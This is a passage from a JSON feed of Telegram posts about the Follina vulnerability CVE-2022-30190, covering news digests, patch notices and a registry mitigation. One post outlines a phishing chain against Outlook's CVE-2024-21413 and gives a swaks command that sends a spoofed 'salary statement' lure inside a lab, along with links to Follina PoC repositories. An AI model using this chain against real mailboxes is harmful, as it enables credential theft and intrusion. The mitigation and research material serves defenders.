\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Microsoft Word \u0441 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-30190 \u00abFollina\u00bb, HTM-\u043b\u043e\u0430\u0434\u0435\u0440 \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0434\u043e\u043c\u0435\u043d \u0441 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0435\u0439 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e DNS \u0432 \u0437\u043e\u043d\u0435 .duckdns.org\n\n\ud83d\udccc \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 - \u0432 \u043c\u043e\u0435\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438\n\n\ud83d\udcca Dashboard \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043c\u0430\u043b\u0432\u0430\u0440\u0438 & \n\ud83d\udcd1 \u041e\u0442\u0447\u0435\u0442\u044b \u043f\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f\u043c\n\n\ud83d\udc26 \u0415\u0436\u0435\u0434\u043d\u0435\u0432\u043d\u044b\u0435 \u043e\u0442\u0447\u0435\u0442\u044b \u0432 Twitter\n\n\ud83d\udd11 #report #woodyrat", "creation_timestamp": "2022-10-13T08:18:14.000000Z"}, {"uuid": "d3aeef07-e509-44bb-ac9a-d814493cdc69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/25", "content": "Top Security News for 02/06/2022\n\nUS Supreme Court puts a hold on enforcement of Texas social media law. INTERPOL issues warning about various forms of online extortion. US Commerce Department will restrict cyber exports to China.\nhttps://thecyberwire.com/newsletters/policy-briefing/4/105 \n\nUnofficial patches for the 0-day vulnerability called Follina (CVE-2022-30190)\nhttps://www.reddit.com/r/netsec/comments/v2maa4/unofficial_patches_for_the_0day_vulnerability/ \n\nRansomware attack turns 2022 into 1977 for Somerset County\nhttps://malware.news/t/ransomware-attack-turns-2022-into-1977-for-somerset-county/60662/1 \n\nDiscord Is the Center of the Crypto World and That\u2019s a Problem\nhttps://www.vice.com/en_us/article/4awkew/discord-is-the-center-of-the-crypto-world-and-thats-a-problem \n\nNASA still \u201cpushing\u201d for a Russian cosmonaut to fly on next SpaceX mission\nhttps://arstechnica.com/?p=1856528 \n\nInformation Security BASICS - Anvil Secure\nhttps://www.reddit.com/r/netsec/comments/v2mrkd/information_security_basics_anvil_secure/ \n\nMinerva's evasion based CTF is open for registration\nhttps://www.reddit.com/r/netsec/comments/v2ehz0/minervas_evasion_based_ctf_is_open_for/ \n\nNSIS Installer Malware Included with Various Malicious Files\nhttps://malware.news/t/nsis-installer-malware-included-with-various-malicious-files/60663/1 \n\nMass account takeover in Yunmai smartscale API (full disclosure)\nhttps://www.reddit.com/r/netsec/comments/v0uv1g/mass_account_takeover_in_yunmai_smartscale_api/ \n\nOST2 Vulnerabilities 1001: C-Family Software Implementation Vulnerabilities (Taught via explaining > 3 dozen CVEs from the last 3 years)\nhttps://www.reddit.com/r/netsec/comments/v2ep1m/ost2_vulnerabilities_1001_cfamily_software/ \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-06-02T05:00:06.000000Z"}, {"uuid": "00f76cbf-aa88-4ae6-a8e9-6b362f341fbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/TopCyberTechNews/24", "content": "Top Security News for 01/06/2022\n\nCode execution 0-day in Windows has been under active exploit for 7 weeks\nhttps://arstechnica.com/?p=1857315 \n\nIs quantum teleportation the future of secure communications?\nhttps://blog.malwarebytes.com/reports/2022/05/is-quantum-teleportation-the-future-of-secure-communications/ \n\nFBI warns of education sector credentials on dark web forums\nhttps://blog.malwarebytes.com/privacy-2/2022/05/fbi-warns-of-education-sector-credentials-on-dark-web-forums/ \n\nRunescape phish claims your email has been changed\nhttps://blog.malwarebytes.com/scams/2022/05/runescape-phish-claims-your-email-has-been-changed/ \n\nMicrosoft Releases Workarounds for Office Vulnerability Under Active Exploitation\nhttps://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html \n\nMarjorie Taylor Greene Says Bill Gates Will Force You to Eat Burgers Made in a \u2018Peach Tree Dish\u2019\nhttps://www.vice.com/en_us/article/5dgne3/marjorie-taylor-greene-says-bill-gates-will-force-you-to-eat-burgers-made-in-a-peach-tree-dish \n\nTechnical Advisory: CVE-2022-30190 Zero-day Vulnerability \u201cFollina\u201d in Microsoft Support Diagnostic Tool\nhttps://malware.news/t/technical-advisory-cve-2022-30190-zero-day-vulnerability-follina-in-microsoft-support-diagnostic-tool/60610/1 \n\nSideWinder Hackers Launched Over a 1,000 Cyber Attacks Over the Past 2 Years\nhttps://thehackernews.com/2022/05/sidewinder-hackers-launched-over-1000.html \n\nInterpol Nabs 3 Nigerian Scammers Behind Malware-based Attacks\nhttps://thehackernews.com/2022/05/interpol-nabs-3-nigerian-scammers.html \n\nThe Internet needs to stop getting excited by vaporware EVs\nhttps://arstechnica.com/?p=1857185 \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-06-01T05:00:04.000000Z"}, {"uuid": "1e14f148-7da7-41af-a046-61acd3705058", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/malwar3s/3", "content": "https://github.com/NextSecurity/CVE-2022-30190-follina-Office-MSDT-Fixed", "creation_timestamp": "2023-02-25T05:20:10.000000Z"}, {"uuid": "0093fb79-fd53-4433-895c-f3e051cf5842", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/127", "content": "Top Security News for 06/09/2022\n\nRansomware Attackers Abuse Genshin Impact Anti-Cheat System to Disable Antivirus\nhttps://thehackernews.com/2022/09/ransomware-attackers-abuse-genshin.html \n\nSAT/SMT Solvers by Example\nhttps://www.reddit.com/r/netsec/comments/x6y3hk/satsmt_solvers_by_example/ \n\nISC StormCast for Tuesday, September 6th, 2022\nhttps://isc.sans.edu/podcastdetail.html?id=8160 \n\nCVE-2022-30190, AKA Follina, Uses Macro-less Word Docs to Drop RCE Files\nhttps://www.reddit.com/r/netsec/comments/x6aqwc/cve202230190_aka_follina_uses_macroless_word_docs/ \n\nPackMyPayload - Emerging Threat of Containerized Malware. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware.\nhttps://www.reddit.com/r/Malware/comments/x6xpb4/packmypayload_emerging_threat_of_containerized/ \n\nHacking my Helium Crypto Miner\nhttps://www.reddit.com/r/netsec/comments/x6d97k/hacking_my_helium_crypto_miner/ \n\nJPCERT/CC Releases URL Dataset of Confirmed Phishing Sites\nhttps://malware.news/t/jpcert-cc-releases-url-dataset-of-confirmed-phishing-sites/63125/1 \n\nISC Stormcast For Tuesday, September 6th, 2022 https://isc.sans.edu/podcastdetail.html?id=8160, (Tue, Sep 6th)\nhttps://malware.news/t/isc-stormcast-for-tuesday-september-6th-2022-https-isc-sans-edu-podcastdetail-html-id-8160-tue-sep-6th/63123/1 \n\nWalkthrough of an unauthenticated RCE affecting pfBlockerNG <= 2.1.4_26 (CVE-2022-31814)\nhttps://www.reddit.com/r/netsec/comments/x6b5is/walkthrough_of_an_unauthenticated_rce_affecting/ \n\nMicrosoft will disable Basic authentication for Exchange Online in less than a month\nhttps://www.malwarebytes.com/blog/news/2022/09/microsoft-to-disable-basic-auth-for-exchange-online-in-less-than-a-month \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-09-06T14:51:49.000000Z"}, {"uuid": "31200dad-8d16-442b-8013-092ffd1c0d3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/monkey_hacker/28", "content": "\u0420\u0430\u043d\u043e\u0432\u0430\u0442\u043e, \u043d\u043e \u0442\u0430\u043a\u0438 \u0434\u0430\n\u0422\u041e\u041f 10 \u0438\u0437 2022\n\n1. Follina (CVE-2022-30190)\n2. Log4Shell (CVE-2021-44228)\n3. Spring4Shell (CVE-2022-22965)\n4. F5 BIG-IP (CVE-2022-1388)\n5. Google Chrome zero-day (CVE-2022-0609)\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n10. Zyxel RCE vulnerability (CVE-2022-30525)", "creation_timestamp": "2022-11-29T07:00:36.000000Z"}, {"uuid": "8965fd15-5fc9-41be-8c34-36fd584e95f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/3-wbVOTdAjOivPyAG2QBt9XaBCAIVLRC_c7I1h87YthbEus", "content": "", "creation_timestamp": "2026-01-08T15:00:07.000000Z"}, {"uuid": "e20dd3a0-50fd-4cfd-b1ce-535e0983d8ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/habr_com_news/6921", "content": "\u200bMicrosoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f Windows 10 \u0438 11 \u043f\u0440\u043e\u0442\u0438\u0432 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 MS Office\n\n\u0412 \u0440\u0430\u043c\u043a\u0430\u0445 \u0438\u044e\u043d\u044c\u0441\u043a\u043e\u0433\u043e \u0432\u0442\u043e\u0440\u043d\u0438\u043a\u0430 \u043f\u0430\u0442\u0447\u0435\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f Windows 10 \u0438 11 \u043f\u0440\u043e\u0442\u0438\u0432 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 MS Office CVE-2022-30190.\n\nMicrosoft \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043e\u0432\u0435\u0442\u0443\u0435\u0442 \u0432\u0441\u0435\u043c \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f Windows \u0437\u0430 \u0438\u044e\u043d\u044c 2022 \u0433\u043e\u0434\u0430, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0435\u0441\u0442\u044c \u043f\u0430\u0442\u0447 \u043f\u0440\u043e\u0442\u0438\u0432 CVE-2022-30190. \u0418\u044e\u043d\u044c\u0441\u043a\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0432\u0435\u0442\u0443\u044e\u0442 \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0442\u0430\u043d\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Microsoft Security Response Center (MSRC), \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0435\u0449\u0435 \u0432 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0430\u043f\u0440\u0435\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0442\u0447\u0451\u0442\u044b \u043e\u0442 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u044b\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043e \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u043e \u0442\u043e\u0433\u0434\u0430 \u0432 Microsoft \u043e\u0442\u0432\u0435\u0442\u0438\u043b\u0438 \u043e\u0442\u043f\u0438\u0441\u043a\u043e\u0439, \u0447\u0442\u043e \u044d\u0442\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043d\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u0430.\n\n#\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c #microsoft #windows", "creation_timestamp": "2022-06-15T17:30:30.000000Z"}, {"uuid": "326f248b-88b3-49c7-aec2-24fb700718cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/poxek/1845", "content": "\u0422\u0443\u0442 \u043f\u0430\u0440\u0443 \u0434\u043d\u0435\u0439 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0433\u0440\u0435\u043c\u0435\u043b  \u043d\u0430 \u0442\u0435\u043c\u0443 0-\u0434\u043d\u044f \u0432 \u043e\u0444\u0438\u0441\u0435 (CVE-2022-30190). \u0412\u0447\u0435\u0440\u0430 \u043c\u0430\u0439\u043a\u0438 \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 Guidance . \u0432 2\u0445 \u0441\u043b\u043e\u0432\u0430\u0445 \u043d\u0430\u0434\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c ms-msdt \u0432 \u0440\u0435\u0435\u0441\u0442\u0440\u0435. \ud83e\uddd1\u200d\ud83d\udd27\n\u0434\u0435\u043b\u0430\u0435\u043c \u0431\u044d\u043a\u0430\u043f \u0440\u0435\u0435\u0441\u0442\u0440\u0430\nreg export HKEY_CLASSES_ROOT\\ms-msdt filename\n\u0438 \u0443\u0434\u0430\u043b\u044f\u0435\u043c \u043a\u043b\u044e\u0447 ms-msdt\nreg delete HKEY_CLASSES_ROOT\\ms-msdt /f\n\n\u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e \u043a\u0430\u043a \u0433\u043e\u0441\u043f\u043e\u0434\u0430 \u0432\u044b\u043a\u0430\u0442\u044f\u0442 \u043f\u0430\u0442\u0447, \u043c\u043e\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043d\u0430 \u043c\u0435\u0441\u0442\u043e \u043f\u0440\u043e\u0441\u0442\u044b\u043c \u0438\u043c\u043f\u043e\u0440\u0442\u043e\u043c \u0431\u044d\u043a\u0430\u043f\u0430\nreg import filename\n\n\u0422\u0430\u043a\u0436\u0435 \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442\u0441\u044f \u0447\u0442\u043e \u0417\u0430\u0449\u042b\u0442\u043d\u0438\u043a \u0432\u0438\u043d\u0434\u044b \u0440\u0430\u0441\u043f\u043e\u0437\u043d\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u0432\u043a\u0443\u0441\u044c\u043d\u044f\u0445\u0443 \u043a\u0430\u043a \nTrojan:Win32/Mesdetty.A\u202f\nTrojan:Win32/Mesdetty.B\u202f   Behavior:Win32/MesdettyLaunch.A\nBehavior:Win32/MesdettyLaunch.B\nBehavior:Win32/MesdettyLaunch.C\u202f\n\u0412 \u043e\u0431\u0449\u0435\u043c, \u043d\u0438\u043a\u043e\u0433\u0434\u0430 \u043d\u0435 \u043a\u043b\u0438\u043a\u0430\u0439\u0442\u0435 \u043f\u043e \u043d\u0435\u0437\u043d\u0430\u043a\u043e\u043c\u044b\u043c \u0444\u0430\u0439\u043b\u0438\u043a\u0430\u043c \u0438 \u0434\u0435\u0440\u0436\u0438\u0442\u0435 \u0432\u0430\u0448\u0435\u0433\u043e \u043a\u043e\u043d\u044f \u0432 \u0447\u0438\u0441\u0442\u043e\u0442\u0435.\ud83e\uddfc \n\ud83c\udf0e \u041c\u0438\u0440\u0443 \u2014 \u043c\u0438\u0440!", "creation_timestamp": "2022-06-28T09:49:11.000000Z"}, {"uuid": "14ed86ac-57c4-48ac-8a11-50181d44e66d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/beaverdreamer/134", "content": "#outlook #cve #social #CVE\n\u041f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043f\u0440\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-21413 \u0432 Outlook (\u043d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u0432 API).\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0448\u0438\u0431\u043a\u0435 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 URL, \u043a\u043e\u0433\u0434\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c ! \u0432 \u043a\u043e\u043d\u0435\u0446 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u0430 \u0438 \u043e\u0431\u043e\u0439\u0442\u0438 \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u043f\u0440\u0435\u0449\u0430\u044e\u0442 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0443 \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u0441\u0443\u0449\u043d\u043e\u0441\u0442\u0435\u0439 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u043f\u043e \u0441\u0445\u0435\u043c\u0435 file://).\n\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u0430 \u0434\u043e\u043b\u0436\u043d\u0430 \u043a\u043b\u0438\u043a\u043d\u0443\u0442\u044c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 \u0432 \u043f\u0438\u0441\u044c\u043c\u0435.\n\n\u0410 \u0442\u0435\u043f\u0435\u0440\u044c \u0431\u0435\u0440\u0435\u043c \u0432\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0442\u0440\u0438 \u0444\u0430\u043a\u0442\u043e\u0440\u0430:\n- \u0412\u043e \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0439 \u0441\u0435\u0442\u0438 \u0447\u0430\u0441\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0432\u0441\u0442\u0440\u0435\u0442\u0438\u0442\u044c \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 (\u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0442\u0435\u043c \u0436\u0435 swaks)\n- \u0414\u043e\u0432\u0435\u0440\u0438\u0435 \u043a \u043f\u0438\u0441\u044c\u043c\u0443 \u043e\u0442 \u043a\u043e\u0433\u043e-\u0442\u043e \u0432\u043d\u0443\u0442\u0440\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0432\u044b\u0448\u0435, \u0447\u0435\u043c \u0441\u043e \u0432\u043d\u0435\u0448\u043d\u0435\u0439 \u0441\u0442\u043e\u0440\u043e\u043d\u044b (\u0434\u0430 \u0438 \u0421\u0417\u0418 \u0441\u0442\u043e\u044f\u0442 \u043d\u0430 \u043f\u0435\u0440\u0438\u043c\u0435\u0442\u0440\u0435)\n- \u0418\u043c\u044f \u0423\u0417 \u0447\u0430\u0441\u0442\u043e \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u0435\u0442 \u0441 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u043c \u0430\u0434\u0440\u0435\u0441\u043e\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\n\n\u0418 \u0441\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0435\u043c \u043f\u0430\u0437\u043b \u0430\u0442\u0430\u043a\u0438 \u0431\u0435\u0437 \u0443\u0447\u0435\u0442\u043a\u0438:\n- \u0421\u043e\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u0435\u0440\u0435\u0447\u0435\u043d\u044c \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u044b\u0445 \u0435\u043c\u0435\u0439\u043b\u043e\u0432 (\u043e\u0442 \u043a\u043e\u0433\u043e \u043f\u043e\u0434\u0434\u0435\u043b\u0430\u0442\u044c \u043f\u0438\u0441\u044c\u043c\u043e \u0438 \u043a\u043e\u043c\u0443 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c)  \u0447\u0435\u0440\u0435\u0437 \u0443\u0442\u0435\u0447\u043a\u0438;\n- \u0427\u0435\u0440\u0435\u0437 \u043a\u0435\u0440\u0431\u0435\u0440\u043e\u0441 \u0432\u044b\u0447\u043b\u0435\u043d\u044f\u0435\u043c \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u0443\u0447\u0435\u0442\u043a\u0438;\n- \u041e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c \u0438\u043c \u043f\u0438\u0441\u044c\u043c\u043e \u0441 \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u043d\u0430\u0448\u0443 \u0448\u0430\u0440\u0443 \u0447\u0435\u0440\u0435\u0437 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0439 \u043f\u043e\u0447\u0442\u043e\u0432\u0438\u043a;\n- \u0416\u0434\u0435\u043c \u043a\u043b\u0438\u043a\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435.\n\n\u041f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 swaks (HTML \u043f\u0438\u0441\u044c\u043c\u043e + \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0430\u044f \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u043a\u0430):\nswaks --to beaver02@beaver.lab --from beaver03@beaver.lab --server :25 --header \"Subject: \u041f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0444\u0430\u0439\u043b\u0443\" --body '\u0414\u043e\u0431\u0440\u044b\u0439 \u0434\u0435\u043d\u044c, \u0412\u0430\u043c \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0444\u0430\u0439\u043b\u0443: \u0417\u0430\u0440\u043f\u043b\u0430\u0442\u043d\u0430\u044f \u0432\u0435\u0434\u043e\u043c\u043e\u0441\u0442\u044c \u0437\u0430 2023 \u0433\u043e\u0434' --add-header \"MIME-Version: 1.0\" --add-header \"Content-Type: text/html\" \n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u043c\u0431\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441 0-Click RCE \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0432 Word, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, Foolina (CVE-2022-30190), \u043e\u0434\u043d\u0430\u043a\u043e \u043d\u0430 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0443\u0436\u0435 \u043f\u043e\u0444\u0438\u043a\u0448\u0435\u043d\u043e. \u041c\u0430\u043a\u0440\u043e\u0441\u044b \u043d\u0435 \u043f\u0440\u043e\u0439\u0434\u0443\u0442, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 \u0444\u0430\u0439\u043b\u0430 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0447\u0435\u0440\u0435\u0437 API, \u0438 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u043e API, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c RCE \u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0430\u0445, \u043d\u043e \u043f\u043e\u043a\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0435\u0440\u0435\u0437 \u0430\u0443\u0442\u043b\u0443\u043a.\n\n\u0421\u0441\u044b\u043b\u043a\u0438:\n - \u0420\u0430\u0437\u0431\u043e\u0440 \u043e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439: https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/\n - \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0442 MS \u0441 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413\n - \u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 PoC Foolina (\u043d\u0430 \u0432\u0441\u044f\u043a\u0438\u0439): https://github.com/JMousqueton/PoC-CVE-2022-30190", "creation_timestamp": "2024-03-01T21:36:29.000000Z"}, 